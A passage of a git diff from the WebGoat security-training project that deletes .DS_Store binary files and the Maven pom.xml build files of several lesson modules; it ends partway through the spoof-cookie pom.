z2t)`(2t)`(2>cfipgo(H_#FGbv_^G=K!m_ei2z?840^asDLEyjSURW@M*xzIq!xwR
zj5kOcN~V;Yl9DV`P==C}p{R}+D8or_D8H1FQ&P%sKy~;)^=4Ej6clf#@eSb)n36K8
zBLpG@W+K4P?v0QK6CCjB&+plS>jdG}tyeMD&^T}Yg1EMD5&yBo!Ur<rekBu{VJS$P
z#p9yqSaw#md(CjX+V1mxx7IeZ1CCu8Wh=XVFEky`F4l#f7<4?#ucZBwX9XuRa=byu
z3dcv;s@|eqrqEu~vj?2O$vUnRJ{;HhZ<IAnOl)b}zH?Wr(bnEM*=kI*wYP6;H9B@|
zpPXdh#^X(!c61#bE=)di_Ki2+di&fv7cNQ|P%S0EF{m$}QKyE973AD3eFb-}DNm7h
zhSD8t%jEogp>C*JfE$#1<;_U!zACa;YRGDf^sYp@dz7(KVBc@MX6Tgd9y7FqQMN1~
zun*;YPhl{a^W9S3BTFJ@y15cL+g+}kaUQXQq0l}Z^43V;7sGDhIOI?)*Nw8}9K&OU
z(DA)sz%B+PHSPT3RqJkT-neC3$L`BZmM&w7<(f7^=zF1a%CU?66+Q*SW{|Tz%kjnr
z%N&2#?(@vNorqo1G!eCWjjo-rD3znW#p5jYVO(08*68|iZs{)CR9o@52v~3ET3<kE
zF;h8iXwkI3hlm6$P=jvTtm*x(nYCSJX)^52yEJ{UEOTdvm9l-irVkPFc}hA+V5?Gh
z?$Y&>{LM$qAUsyEJ<95$di@^CYM9%)EQ{w9Z%%EL^VXc&DjSS%No%1M_QHM`fgE^H
zfoI`4cphGbv+y2#03XAr@Ht$9FX1b=0zbfy@DuzDzrr>60|7N$iVPFD9GlR<+prlo
z;1+Dh9k>%aFog&4UObFPupdvNiCN5{ixW7BkK$u^24BRN@MU}jU&C`UpIDWyJ#_@5
zCcaBmJ<-$^Tx@VQq9yk)IgtKWh<0_cq}Pg-s}$e5YLh0|RL>GY4LSFM6V*ANHlNo~
z?lO^Z?Ybr{*-s?0PtV0%wm?#Zd#^V%je(>w?{8>HCRvQQ8yACZ+MLu_gJ3AP68VyB
zp5P+y674kBDA>xoox8|7Uyzb__w1#i;(~Czn{J_@kQS_&M4OXlufutGA3lOl-~xOB
zU&HtC3;YJxu#t$h8g-)8EttgHaU<S=twgPz*ok-JJ-8e9;Q>4(=+%b<IE2GELiDn6
z49C&IB8FJT3ZBNt@d<nqpTei{g}(?ljcy00(T&rwMz_4*(_@vw9Kbh0?3nPZvsrW6
z3gdIHmE}y)bA4}&Mw5$f2sQ)|Uccxn<*bXYvehNmG5(!Ou4bzxH^Vkda?7AZfBzwE
zk|DU1js*ss0-xFz^@_7(af67u+^WFcFrt?6-;9{$I|K;TszEk%e*WJ#_x*p>J(3Xu
z5d!~11hBCu)03tTtNw>E{TumN+o0z`dU)Y}Q&Nf$s;;{TpuRee3txj=c}z;lDJexL
a=|w2Xf9N70+W({dAHuv}+f8rI{r^umCXx04

diff --git a/webgoat-lessons/missing-function-ac/src/main/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/.DS_Store
deleted file mode 100644
index 7ee598c2b590178fb052c7c2e0e89086ab62c78b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 10244
zcmeHMU2GIp6h3F$!t4Mt+k#!F3u{Uv#TF?oP!w=mihw|9+|oa)>+H_hj?T_(c4l``
ztk#hD7o+hfF)`7^R>f%KNu%+>#211w{v~MagT9y;^~uC16B9l6-r2e?+XoY&nA|&=
zd+yIU_ul#LH*@x$1pw?X7+nBy08r>=Qd>z`jl}xdeMt%hEgDHAdq|hOT-tWiRR7}=
zZP_3ZkO)WwBmxoviNMu>0Qqc|lodkCTp}P5kO(Xwz`hT0x|vJ_az;r0>7a}s0Z7(U
zGfz}z#{p&&4`d>cGeS}iB^0J4g((I{3>4<n9uM>qft(Rim;(lf4-96;;DmyFb{ap<
z)d3Si%3LBK5x5iq_PW%=y`V!8^vd&lI%iv+zirz*hU)4YmMvGp>I!yg5%tdGlv_&r
zx?k}6_54X*vkWsGlm~Txs$3p&U3;Odr-v=Gl+xDhcO75195Y{GIx%87hFj`)3y$GU
zB*l0mmf=sOw6%kIvq+|cx?>Joo|U$2%fDX<vn!>woIc&z)zh=PBi_~3JKYgK-PPT_
zy(7MBN6+-M_MM`%wD0IUHkO-ya(3>u*WWn%=J^W(1`IwW&{PG>CzY7klU>P-o6S||
zEZ}8(#X%A82)SjvzOBG3IuKEBOKFX4?Z<Pz<vQN5nfFMhwACJgcsS!a!LyBIT)U8U
zyp$Hn=ys-H>%Q4%+ezyI(;M~8Q$8z=dv4y}&lOXeR`AR_OwzN8<^XAXqZSRv)HDpg
zwQ}wH4Xv9yx9{3>an&`ewMe6?juWVkZ{1^=`4c6E?3nIlOvkXC$&n(1)i#G5J!?in
zpM}HR>e}Y0I$_Y*$6SNi8QOb_=xJ$=Mo+Sy{dtpeLs7WF#&}d6^4JpeKyg!>st(;p
zd#icDpzT}K=m}d-o3>_zh1u4d)aXc2K%*TA8oPVc=qN#-rA2!Y><F5BcSoalv6+wR
zo_{=NI<%?_H2vOvx2}pdNBhf<QvHaEGRCa>41-qNn%FEhG~All7Hq8o>tHK6x<fDl
zCgk7@JOxj~Gw>43!8v#rK7#Y`DSQrJz?U!&Kf+J&GyDR-!Ji0-sN!mjU?Vo+b$C6t
z;wEgvt=NM*aToStA0EadcodJ}Fs3k#88k4958^}kFwWo;_$<DNui`Au;X8N^-^UNc
znnGoY9;~1r74c)rDrp#m-9jU^Xc#-tq#j%v8qTj2<ZD{9Heh4l!j@KTVkMh6g#<@9
zcgo!0^!x`QFA_!9t#46dCx~L^sp?HHlR;Z92*k8E#$z!};hbUBO>I;S5wR6MR{NHi
zs?~A&vR-0lOl#moWmV#&s?~EUvuf{d>RrYe%c^_#Q7?$sht<PvF_pei|AuU{@HTwN
ziS`wI1K-0B@GJaI6l)-QHRC!WR}44c4cLx1Vh45-y?XIxyao5*0X#?~yPaq@L?j!<
zF&rnFnK+44Xki|GEMf^y;UjnkAH~P;aU$Jw_&mOVFXJm!bURc<x3iUW%en&tM#0Yj
zeC;)epIZx5%(}*+eYvT{zof-v-mzV0lICHQ4?~__K@VIgP$|R8|7YK{lli9Z|I9bl
zK&OV6s--3UmGoCj=C5iKQhF}wxh}KkszJO;9~K(o-ma$B-`;F-tr~u<##mJzj!!8w
ziNF#fP$%Y&v-tmk#sB|b!WGJ?B?1zG%Z&im4<rZrX_j)dp?X3VYmd`?H{C2Ty%{07
y31vJSPm+h@slvkXJj6n6<p2w_OHezLGeS~{(iQ(RK%W2Q`M-4KV$)aS`TsAcj4X8k

diff --git a/webgoat-lessons/missing-function-ac/src/main/java/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/java/.DS_Store
deleted file mode 100644
index da3ec95ed2fb32595ebe59649631acf665cd4ed2..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0UrZcD9LImZ1KPc9D|=96DPDU9h@}ETO9iy82OQGck`j;qMbEw46*lheUT*ge
z6j4kQ|HWwhlbD!jBB(VQ`=rtMVB$+tWBiv?BM<swV$>%SpG-{jH#<Y2P#%1!HR;Y}
z=Qsa;Gjreh+|11a0QMC0HUJd>Bzl-two!DM!0OqvA%sK;t3>h#H<z}YH0AzE=Qgws
z3IYWJ1p);E1p);E1^y2T(3#DGw8^>8YlApYAW-0%RDkUdF?yJd3%kIrzjaXLUjfLL
zQn4Q>t*`{yn6PnS7r3Pw3dmi_a#s{r4CL-q9uw{2!Y**j-2uhr1I5TFZYb!FPW{LH
z=74c-gE&wiP++41>}OK~4&-4fJ+t=yZkevv+PaLPlG3s*TcxnPjeV4ed{1)PnMrz@
zS8#i@{3$<Y>PA|m2Q_bcB|YRg*2T1z9x;uXl(Mteu|3VSjr<zd$x+kRotYk|VC(K=
zlJ_@i>fUrpsT#~1MRFa~Y-7Z9&9rHm-h)z@eNsy8++1^8dwW+?tgWqcz9}}>cHqGN
zrdY?p_W60`2T7`JJlH)jo|}Jqap{dW-#YX5x$|5E6dMUtt`p_6RYk0+wq(Z1u6>sw
zw6fgdAb-~pa?&}j)%R<(QWFvR&XiKY=6y2fnU3v_7<rd$N-1|qz+)N57T;?$<5-2P
z?WUASMzb;nOY@9w%SxIL8Sa>8%z7*};W~M**Ke3ol!9yAZBRS2Xe6k$J7!XMteJx0
zceYpU+FiG|d4I>D3p=hWS0WX%JVAomo_W7%<cDXNs^glQF>Kwmr$&oRQp*^!wX6{d
zeGv}(Ue{Nv@}y3E4>&sW)0Gb-UQ=7Gs;5{@Z{DC-mn7d|PfV4ETs8$wG^}rs<)H^?
zT@_b!+PF_vhb=8_Sc)FzZY{US>S&QmqZ}872ij$IjD*k9q}>QMiQ>*KRlS#ud_r@*
zlR3ktS)Hfh4<ET>hgz-ntbCRAUs00AnOC>2(`@VFd-;Ng>*B3q=_ROv7CPdN!Xy}w
zgVXQ~JPXgkE3gD-;eGf7&cWyKC42>6!!rB~zre5X8~g!(BOs!T<ru*Vti&7eMy$hn
zY`_+5$6K)jJFy#&;c+~H12}>yOk)Oh%;LlN2tJAn_!K^mFXQXDh)eh$p2ZLGBR;3l
z3ZDI9j>6!llvssOyl@MRUJk-&U!~lCbs${c&e5yfStVHPzPO<4mT)agK0urhpPUsk
zd^j(`@d5!_v#VB)4ijL;?D{2NK|$Hd@nNm^#G+9}@`+*D`Uc8|2y4mjt8rgcR!V$$
zSuJrHRmyx!S(b>Dl~NyMmhJ4K+ATh>EPMC})dK(Vuza{7D%0-tZ%|u=cj03nvv1%#
z_z`}B-{DUJtc>8Q#u`E^io5Y9Y{Z+f37ZM7PP`3o$3xhM{e;+E1lbTFHiqLkL68|Z
zh0|za9z87L49?<Xcp4waC-6x^?ge}iU&2@MwRNx^T?gBlRoJplBB2+&48XT;8Q(Jn
zhFM47q$W4L+5TBf=55Qdr>OrG&@UZ2$X$5_O85{eyZ`rX{{H{UPb3&2P#{p?swse_
ziDaUOhTm)}W_RrvJ@?VW0&BOxt?xpSe;p_5U&qO^dxak;9b*ZyabXv@r4kDN`HKMd
SkC7eH!TBGY|2~1&X7mqKp#rV|

diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/java/org/.DS_Store
deleted file mode 100644
index 8339472c99d019461c40bd63bbc20760ebcabff9..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0U1%It6vxlmB<<|9HM2=$CXL&!B*CU8G25ml(Y9{BOlun&+<Z5>&hCuK;Oxw@
zGrJp&(MZ8BMDYUzLBT|=DE3KFd=Pvo74ZwIm<N3kM12x`5(GW>&TQFint~Lx(7DUp
zb3e|xbN7FLduQ(e0QTq9D1ZzA0$t2X+bFw4V*TvekOE!{>qLqN$RrDPCTUp74ZePZ
zuYj+BuYj+BuYj+>)u8}Avsn^0dG5Qte(o#aD{xIJ!1jj-UChQjyX;!Nbx_8S0Awqv
znI|gKIe^DRJR9@uvTJ!Ljp?2q&<jQHh=Fc6^+%XH*_daSUF(Jey5WG{ozXj?Aiq1s
zMYua)%(Z^*E8r`zQ33X|sR9cMpn$#Z{Qg%mW9YWi*|~;+ipr`jTZN#wjeVq$cu#!Z
zD#RVd$=Ur%_7tz_s+RQ1qlz<MERR{1aj~o<Cv>flkaiAOrlaVlmMsaLozzX$D)d`9
zQ?+N~?s${B>dYsky3wqbr_fQw)FyOWPwIy5JSYU&Cm}U1F1AOzx_a9p(P+<7TVyeM
z;K2U2NcX|6r6uVHL1=6}*f%nrS$cY9^^G^*I`j6q^R5u+Z6;7#Cd_B+RWatG@syR$
zlz5eBX4v^r_nk+;Dr)w9iDvR(NW3#4)v)=W%s9Gb+7nvVCYz9|Z4&ZW$}+w0H<_}G
zT-vk~QYfVushpuWTAyLW^@lWj%Fz}aR+_P`tTVtJ6Oxp(wYxR))AQOOdD~Mu4aeLh
z48F6yZrARnz3uzE4_(-CU9}Xd5ycr2)^zmybuBwyVCqgQc1kl<-JF}uGieQN%v91^
zDDXuv$fK^Wm&I9?#vZX$7N<%d2yRbfy)2(%Jp);da#av`z@CUKj@fJqis#teB8p=V
z(E3WYH)!iVQ64vxq-IEJ&<*RjMU*G=t~Andukk>aC{L02X_~Yh!ZxqDr&pHmWp_TI
z*v`p}X40(A)9nu*xnqZ1FZUO}O8Hk5glQJlr>ZpDrr2J0NrO$XPH%AqXn+oS=p2Pv
z&>#b+;Td=qo`Y9l70$x@@ClrQ&*4k>3ciLl_!)kIU*R|S1O7%pL=meogf&=;H{gxf
zgw5E39oU7pVmJ0+A0ETwcmhXo0uz|T6snlUhw%}76qoTSd>&uM*Kq|`@jX0?AL2*u
zoB~Bmhf4sYB7REQdJw&rZ-L26ffydD6^H*H5ZAW5_|@*L^LXsLxTs~zSjrQJ$fbnS
zQ>23fx(>+;1Zl&rMln22kZB9$%U;Am+Ug?2y!S-HVM*ZBuxfJ)RRe^!z{hIc7Z#-o
z4lwH_Hp5aCN0n8HN>QrhFtch;FZFKW%(Cj?Bh(A-4~W%+En$&%s(*vq3cL#+bJV_p
z@8C!H34Vt^39>2ztR5Q(uQ2Y$o3Isc#x`sxz<TgDyd4kW5DpV&cM)h~gxM5M;|zhO
z;T+DRj#+dtj|E)7$M7^hj!)o|gxw4HBEE#L;%jBV9W4Xy%zEI`*5II;b5a1`+EsPj
zw*<$urCz2tGk>`~H6PEKhGovtm__*4PsOiYxdIjL5HdUe4{iSb|H^OVkKildD{$2+
zfR%&s!G4<FW?L;gYe(q1k1m#&-?D3Y2xa^@PL?0X$+B|=PgIVu0@;{nmt9LOl>YM<
V0sJo{dn)_SfB*T<5xgd|e*j!~4)Op1

diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/.DS_Store
deleted file mode 100644
index 2609cccd36d669cdf7efd8f2caf906bc80c36410..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0TTC2P7{|YFfigR7WfqDI#ckIBu~a~A6{>ArZqnM45*JvY=sLSI!o=B`&CcvD
ziYTUuw-}9=#Kc4sL9Nl)CymAj6JMGd<1ML19`wb;s81$7nV9Hz&dfHjln`IMq;ocN
zzH|A$GiUziH#2(%0B|6ub^^!%Ake|Aw3D(cB-YQ4O)22Duui0S01Fgwk_9`HG&Xtr
z4ZZ@t0=@#i0=@#i0{;aC=$*}yu*G}d?e%kC0bhZuQUUgSh|s}o)U(U3<&O@^_!fX{
zIW_Y{W!eYun22Yio?Uh=52Z2P-2-}|=xs634X6GHb0-`1?6Pa!a6mU4&^t4FI~3$+
zr??1r2aLMb&wT}a1vV?dZktLdfCfpJTfcv|lGO7@GGpkr)6ubpfwJ<79hE{*+{u1Y
zNW3dHZxv#W;^gcBC3}X~bX7}w<uS#XFP6tG%eY)tl9RetNJx7IEz?nSQ_HRkosH|J
zY83{ooT=KgF?YPUt~&Dxsdg-@<tcPbF||qE)|0xSJNFAg_De_&i;HcYUESTSk<Ol;
zrPjz|XLom3Yozy3&(f0gogg%{9O@sP&MZB-vijQVZ=8Gc!bMjM^d2ZsQzFhMo0T!<
zI%6p-omuBuqMc#q$C3uqE?^b4`*xjn@=!>;Jt0-I>o}cpbj!3SwX97xAywHV=!ukN
zde<3GSw=2x+6gI?QjAp2P#mq_Fk<=xnmy%c3l1yI*jCmV<c<kR%GuhT8u{sYZHT<>
zDV>I6ZW0FH+Eu%EU*mzcuHGY;c3)E^g{nnyh6FYp{a#(mP868R(~6zaOjS4M;&~>q
zp^ckLS_=g}3kG@AwRN&MtJ2t`mdfH(={>>iX{eLsGpuJYt5L2B0uR_9k;QSFO+oP-
zo0>&&{61P|$@T_qIVj2#hLY3_Ne#MT?Kg>XJnu>)o%9;JdqjDP79dTNwnNzJHTNBs
z<-6ILPbs!@I-{91tBZ8{qsMOBE!W8d#Y-u@L_wHlQT?h)vu%tXaF;dM813*DSb%zH
zrx(z1n57#e183nWcp9F8mtYmn!@KYiT!2sEbNB+jgf;jPeuAIj7x)eSL_kClt1yJs
zScBK$_1K6_*o^JigEwO@_F+Gsz>|0iM{yDpn8XySn8pY3A$%B@@d<nuU&L2&1y}JM
zJdf|=2kx8#MO;VLK}bdXn6k|<(uX(>WBf`mhKFm!k$(rqwOuZPHG673Ci^chY{^ot
zXNrU5lEMip62c+ffaN6uwSI4d7@i=|w1v{8FCrmTx)?F<{gH535;!@m+SE+d0O2k0
zv04s>MX8KK%zBB>uvEcuWmO_ml*&2KtlD>&dUtScS@q~K>IL^EV)bBiSfr=c-$8B#
z-i8l3ZePJS@ICwhzrybXS_MH?hxLS5828}~*n&4=E4C42eRvDribrr5M+mh$2)1!T
zZ3?GxhG5fh4(CzFEIOFS0xsYqcorYU$MA7N?>T%PU%;2~l@jQVmq2%JGjwTdXh_XD
zDS)r-iZJ&t!7^>B+jwN=w|ma!V_DO%%sCprctdQQnqS*qfil-cX8Zr)t-t?oKalU?
zE8r{ezf}OshhjqmH2tj}r2*=T&~XnPEHS@j*YXg`m<wy?+i|jNU%?ZVBdkC+>e*%2
YQVXSj{6oNof4Bbo-+%ve46nNEFVWu}lmGw#

diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/.DS_Store
deleted file mode 100644
index 3efe5f71232d664d8ac3a94aab516092ac613b82..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLU1%It6h3G3)7fcjW|PKD8n<0Zf=x|g{%TTf>*mk2wxPjIvPl|UXLrVAaCT<d
znca=XXr$mDqWA-XpkSg_6#JwoJ_x>)iuear%!9rNqCN>e34)$`XSO7prXU3^bnbHR
zx%ZxP?!EKfZ|>bQ0DuEIwG%)F0D&@-(sn8?k(i$4O)22@FeQ>dfDUG|U}utsmE2_Q
zclZeS2>1y22>1y22wV*a(4Ebau*JRaYW>njz(?SkM1Y+S5z0(PJ-O^kesoa5LjaQH
z)XfvsDGuO15l==vx$H{rN@Kdw1A4CLg&63%lRm=CNk%=n>`K=i&~*p&W=1bUK|VYA
zMYuU&)RlheBj6*j83Fd%R6+&}$iZAm{Qg%mW9YWi(Xobsvhs?`Z9-7o&VEuzyeBqq
z6=II!<m>?@dy2PoRZDvHF~ylL*2gW&xL8+`le$(&NV^6t(@}I&%dT^sjq9dr6$Y%F
zsoJwKcf7c+I`avsb}Xyq$#qOIwMpI9le(ch4+=r{OGpiii*21<-QBH`&Yqs7*2rRK
zcXwB7r1wD2(vtLpAT+cb=pUWVEIqxl`o^1Yoq7A*c^3-wjuWUUf#$PPT#UKSSjtLg
z*4b^q&9L)h?st!XRmAQ4b-2kxA@R<HRL!2@WX91g)1K6_HpzrkWfPdkQkLmGV?1RU
zxwL5~q)<vRQaM9$w0^^g=?`i4l%p*;tTtm?S!a+NCL}3mYj<m8r{}dHvbLvm8jhJs
z7<^|(?e0B|``WsC4_(-KU6mB77R4C?*L3vzbuBwlU<gkuc1kl<-JFZ(8N7xzZYpUl
z6!;<-<X+d;$>OX^V~<)Y^HZe{1Xt5gC(EapW-zN!sR{yj*c*|>ahokc@eG@qMREKA
z+GEM~25s3d$`gi?)C@@tx^C^ah;lsdLL(jbI=g#Bd5Yjq)1vJVwtC%t2W9zQHuDL^
zc1~tAlU8+}raye-j-7IyJWza;(nl18Y39|hs<hh1=stH-gN@M+Z+iu(hjzMpj>0Tx
z^m?3zXW&_Q4qky(I1BH?CvXlvhcDqP_!`#WXZQtvh2P*0_!|KcMXbUQR$~p`fHz_z
zHeoZiV-Mbnz1WBScnpu@2^_^qOkfgIsA3u)#z*i`T*jyHd3+gP#}!<~_wX!!h#$FY
z3KXe2vW|jO#ZRdyrK0x<E)c&I6~n_d;>iC)#kCzS0c&>EdW`J9xUD4{xt>v+MlMe{
ze~SFz6x~3|3q;fU-3?-Rf@r2Klx}>H5Yjf6M9g|`Bpj9m&KuTjYNlp@$Sv@(TK0!U
zsf<&YX^EX-se+T0HHnv^RL<$lntcaJTgh3=num{&7Ti~ewS&!Jk<P1sL%0=q7e3}>
z`v$&)AK@qX9sVSmRS?DMu$~AO#yxlww&2a!ifu%(KD-TY$3r-bBSf^jh-%|Rv?-j%
z8KRnob2yJWX3@bs7H|O{!_)XUK7mgX@m|0e@g;l}Un`;9(Gtp?DWzQ68X8h_P72^#
zyCTA^H&8Ndsh8Df<}ZJ`=3`mYu*^9cx%e9JN&Mmp5GZqfWfuPrZ~guM3TE(KeFS_2
zu66{ld?+?FK&#y9Xl1c>gz|lqSz>m}uH-IM@Nk?Y564NexPm9DM_7eq)RW7uq#jED
U`G)}h-`2nX{rjKO@0u<C0YK&!dH?_b

diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/resources/.DS_Store
deleted file mode 100644
index 6efa04a20a9e4d079ccb94bd03cc4336d7391b9f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~y-veW426#&LY2C7WW2A?jq$1~PrwWCQv^sU9a{EmeQl0?jTDHGIx)~=$@e6_
zcCPXbaSXs#ADbnx05GGw;^@oNeBXUy7a6&vnm=Q+f9fB1yPh|vn%8!C#Q|IN<N6M7
zSmFln<KPv8TRh+e&)APQPCZU}A|L`HAOa$A_5`v`&*o=OLI6ZS1b!0m??a)x*3_YC
zd^)(q2te%^4&!yq64c@WYE2!QGD5RfN^PZ<BZjqd#!Kea)S+oBhvo2Ld9vk%VsSd3
zUm_h=n`#vS5%^BPXK&iV`~NNdm-*jwWFjB}|CE4r>$~-eFPFV_@|xaj3;mw{Wz3Cq
mF42mq(TaKFt@wJBSNxj$HFanj<%~x;RX+mGMJ57&LEsaswH=rM

diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/html/.DS_Store b/webgoat-lessons/missing-function-ac/src/main/resources/html/.DS_Store
deleted file mode 100644
index 5008ddfcf53c02e82d7eee2e57c38e5672ef89f6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3
zem<@ulZcFPQ@L2!n>{z**<q8>++&mCkOWA81W14cNZ<zv;LbK1Poaz?KmsK2CSc!(
z0ynLxE!0092;Krf2c+FF_Fe*7ECH>lEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ
zLs35+`xjp>T0<F0fCPF1$Cyrb|F7^5{eNG?83~ZUUlGt@xh*qZDeu<Z%US-OSsOPv
j)R!Z4KLME7ReXlK;d!wEw5GODWMKRea10D2@KpjYNUI8I

diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml
deleted file mode 100644
index fd0b2cec9..000000000
--- a/webgoat-lessons/password-reset/pom.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>password-reset</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/path-traversal/pom.xml b/webgoat-lessons/path-traversal/pom.xml
deleted file mode 100644
index 14319ecd5..000000000
--- a/webgoat-lessons/path-traversal/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>path-traversal</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
deleted file mode 100644
index 36a330a16..000000000
--- a/webgoat-lessons/pom.xml
+++ /dev/null
@@ -1,90 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <name>webgoat-plugins-parent</name>
-    <modelVersion>4.0.0</modelVersion>
-    <groupId>org.owasp.webgoat.lesson</groupId>
-    <artifactId>webgoat-lessons-parent</artifactId>
-    <packaging>pom</packaging>
-    <version>8.2.3-SNAPSHOT</version>
-
-    <parent>
-        <groupId>org.owasp.webgoat</groupId>
-        <artifactId>webgoat-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <modules>
-        <module>bypass-restrictions</module>
-        <module>challenge</module>
-        <module>client-side-filtering</module>
-        <module>cross-site-scripting</module>
-        <module>html-tampering</module>
-        <module>http-basics</module>
-        <module>cia</module>
-        <module>chrome-dev-tools</module>
-        <module>http-proxies</module>
-        <module>insecure-login</module>
-        <module>insecure-deserialization</module>
-        <module>jwt</module>
-        <module>sql-injection</module>
-        <module>xxe</module>
-        <module>idor</module>
-        <module>vulnerable-components</module>
-        <module>webgoat-introduction</module>
-        <module>webwolf-introduction</module>
-        <module>auth-bypass</module>
-        <module>missing-function-ac</module>
-        <module>csrf</module>
-        <module>password-reset</module>
-        <module>ssrf</module>
-        <module>secure-passwords</module>
-        <module>webgoat-lesson-template</module>
-		<module>crypto</module>
-        <module>path-traversal</module>
-        <module>spoof-cookie</module>
-        <module>logging</module>
-        <module>hijack-session</module>
-    </modules>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webgoat-container</artifactId>
-            <version>${project.version}</version>
-            <scope>provided</scope>
-            <type>jar</type>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webgoat-container</artifactId>
-            <version>${project.version}</version>
-            <classifier>tests</classifier>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.mockito</groupId>
-            <artifactId>mockito-core</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <!-- Please do not add lesson dependent libraries here, place them in the corresponding lesson -->
-    </dependencies>
-    <dependencyManagement>
-        <dependencies>
-            <dependency>
-                <groupId>org.owasp.webgoat</groupId>
-                <artifactId>webgoat-container</artifactId>
-                <version>${project.version}</version>
-            </dependency>
-        </dependencies>
-    </dependencyManagement>
-</project>
diff --git a/webgoat-lessons/secure-passwords/pom.xml b/webgoat-lessons/secure-passwords/pom.xml
deleted file mode 100644
index c280e0255..000000000
--- a/webgoat-lessons/secure-passwords/pom.xml
+++ /dev/null
@@ -1,19 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>secure-passwords</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>com.nulab-inc</groupId>
-            <artifactId>zxcvbn</artifactId>
-            <version>1.4.0</version>
-        </dependency>
-    </dependencies>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/spoof-cookie/pom.xml b/webgoat-lessons/spoof-cookie/pom.xml
deleted file mode 100644
index a456b8597..000000000
--- a/webgoat-lessons/spoof-cookie/pom.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0"
-	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-	<modelVersion>4.0.0</modelVersion>
-	<artifactId>spoof-cookie</artifactId>
-	<packaging>jar</packaging>
-	<parent>
-		<groupId>org.owasp.webgoat.lesson</groupId>
-		<artifactId>webgoat-lessons-parent</artifactId>
-		<version>8.2.3-SNAPSHOT</version>
-	</parent>
-
-	<properties>
-		<jacoco.version>0.8.7</jacoco.version>
-	</properties>
-
-	<profiles>
-		<profile>
-			<!-- mvn clean verify -Pcoverage -->
-			<id>coverage</id>
-			<activation>
-				<activeByDefault>false</activeByDefault>
-			</activation>
-			<build>
-				<plugins>
-					<plugin>
-						<groupId>org.jacoco</groupId>
-						<artifactId>jacoco-maven-plugin</artifactId>
-						<version>${jacoco.version}</version>
-						<executions>
-							<execution>
-								<id>default-prepare-agent</id>
-								<goals>
